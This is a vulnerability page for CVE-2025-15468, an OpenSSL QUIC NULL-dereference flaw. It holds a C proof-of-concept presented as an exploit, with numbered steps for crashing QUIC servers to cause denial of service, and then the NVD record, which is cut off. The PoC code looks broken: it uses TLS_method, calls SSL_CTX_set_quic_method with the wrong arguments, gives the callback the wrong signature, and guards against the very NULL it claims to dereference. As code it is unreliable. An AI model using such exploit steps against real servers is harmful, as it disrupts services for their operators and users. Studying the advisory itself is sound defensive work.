CVE-2025-15468

/* * CVE-2025-15468 PoC - OpenSSL QUIC SSL_CIPHER_find() NULL Dereference * This PoC demonstrates triggering the vulnerability by sending a QUIC ClientHello * with an unknown/unrecognized cipher suite. */ #include <openssl/ssl.h> #include <openssl/err.h> #include <stdio.h> #include <stdlib.h> /* Custom callback that calls SSL_CIPHER_find() on client_hello_cb */ static void client_hello_callback(SSL *ssl, int *al, void *arg) { /* * Get the cipher list from the ClientHello * If cipher_id is unknown, SSL_CIPHER_find returns NULL * causing NULL pointer dereference */ const unsigned char *certs = NULL; size_t cert_len = 0; /* Extract cipher ID from ClientHello (simplified) */ unsigned char unknown_cipher_id[2] = {0xFF, 0xFF}; /* This call triggers the vulnerability with unknown cipher */ SSL_CIPHER *cipher = SSL_CIPHER_find(ssl, unknown_cipher_id); /* If cipher is NULL and we dereference it, crash occurs */ if (cipher != NULL) { printf("Found cipher: %s\n", SSL_CIPHER_get_name(cipher)); } } int main() { SSL_CTX *ctx = SSL_CTX_new(TLS_method()); SSL *ssl = NULL; if (ctx == NULL) { fprintf(stderr, "Failed to create SSL_CTX\n"); return 1; } /* Enable QUIC support */ SSL_CTX_set_quic_method(ctx); /* Set the vulnerable callback */ SSL_CTX_set_client_hello_cb(ctx, client_hello_callback, NULL); ssl = SSL_new(ctx); if (ssl == NULL) { fprintf(stderr, "Failed to create SSL\n"); SSL_CTX_free(ctx); return 1; } printf("CVE-2025-15468 PoC - OpenSSL QUIC NULL Dereference\n"); printf("Trigger condition: SSL_CIPHER_find() with unknown cipher in QUIC context\n"); /* * In a real attack scenario: * 1. Attacker establishes QUIC connection to target * 2. Attacker sends ClientHello with unknown cipher suite * 3. Target's callback calls SSL_CIPHER_find() * 4. Function returns NULL * 5. NULL pointer dereference causes crash */ SSL_free(ssl); SSL_CTX_free(ctx); return 0; } /* * Exploitation steps: * 1. Attacker identifies OpenSSL QUIC server (versions 3.3-3.6) * 2. Attacker sends specially crafted QUIC Initial packet * 3. ClientHello contains unknown cipher suite ID * 4. Server's client_hello_cb invokes SSL_CIPHER_find() * 5. Function returns NULL pointer * 6. Subsequent access to SSL_CIPHER structure causes segfault * 7. Server process terminates -> DoS achieved */

{"cve": {"id": "CVE-2025-15468", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:14.400", "lastModified": "2026-02-02T18:38:00.947", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Issue summary: If an application using the SSL_CIPHER_find() function in\na QUIC protocol client or server receives an unknown cipher suite from\nthe peer, a NULL dereference occurs.\n\nImpact summary: A NULL pointer dereference leads to abnormal termination of\nthe running process causing Denial of Service.\n\nSome applications call SSL_CIPHER_find() from the client_hello_cb callback\non the cipher ID received from the peer. If this is done with an SSL object\nimplementing the QUIC protocol, NULL pointer dereference will happen if\nthe examined cipher ID is unknown or unsupported.\n\nAs it is not very common to call this function in applications using the QUIC \nprotocol and the worst outcome is Denial of Service, the issue was assessed\nas Low severity.\n\nThe vulnerable code was introduced in the 3.2 version with the addition\nof the QUIC protocol support.\n\nThe FIPS modules in 3.6, 3.5, 3.4 and 3.3 are not affected by this issue,\nas the QUIC implementation is outside the OpenSSL FIPS module boundary.\n\nOpenSSL 3.6, 3.5, 3.4 and 3.3 are vulnerable to this issue.\n\nOpenSSL 3.0, 1.1.1 and 1.0.2 are not affected by this issue."}, {"lang": "es", "value": "Resumen del problema: Si una aplicación que utiliza la función SSL_CIPHER_find() en un cliente o servidor del protocolo QUIC recibe un conjunto de cifrado desconocido del par, ocurre una desreferencia de NULL.\n\nResumen del impacto: Una desreferencia de puntero NULL conduce a la terminación anormal del proceso en ejecución causando Denegación de Servicio.\n\nAlgunas aplicaciones llaman a SSL_CIPHER_find() desde la devolución de llamada client_hello_cb en el ID de cifrado recibido del par. Si esto se hace con un objeto SSL que implementa el protocolo QUIC, ocurrirá una desreferencia de puntero NULL si el ID de cifrado examinado es desconocido o no compatible.\n\nComo no es muy común llamar a esta función en aplicaciones que utilizan el protocolo QUIC y el peor resultado es Denegación de Servicio, el problema fue evaluado como de baja severidad.\n\nEl código vulnerable fue introducido en la versión 3.2 con la adición del soporte para el protocolo QUIC.\n\nLos módulos FIPS en 3.6, 3.5, 3.4 y 3.3 no se ven afectados por este problema, ya que la implementación de QUIC está fuera del límite del módulo FIPS de OpenSSL.\n\nOpenSSL 3.6, 3.5, 3.4 y 3.3 son vulnerables a este problema.\n\nOpenSSL 3.0, 1.1.1 y 1.0.2 no se ven afectados por este problema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.3.0", "versionEndExcluding": "3.3.6", "matchCriteriaId": "F5292E9E-6B50-409F-9219-7B0A04047AD8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.4.0", "versionEndExcluding": "3.4.4", "matchCriteriaId": "B9D3DCAE-317D-4DFB-93F0-7A235A229619"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.0", "versionEndExcluding": "3.5.5", "matchCriteriaId": "1CAC7CBE-EC03-4089-938A-0CEEB2E09B62"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.6.0", "versionEndExcluding": "3.6.1", "matchCriteriaId": "68352537-5E99-4F4D-B78A-BCF0353A70A5"}]}]}], "references": [{"url": "https://github.com/openssl/openssl/commit/1f08e54bad32843044fe8a675948d65e3b4ece65", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openssl/openssl/commit/7c88376731c589ee5b36116c5a6e32d5ae5f7ae2", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openssl/openssl/commit/b2539639400288a4580fe2d76247541b976bade4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openssl/openssl/commit/d75b309879631d45b972396ce4e5102559c64ac7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://openssl-library.org/news/secadv/20260127.txt", "source": "[email protected]", "tags": ... (truncated)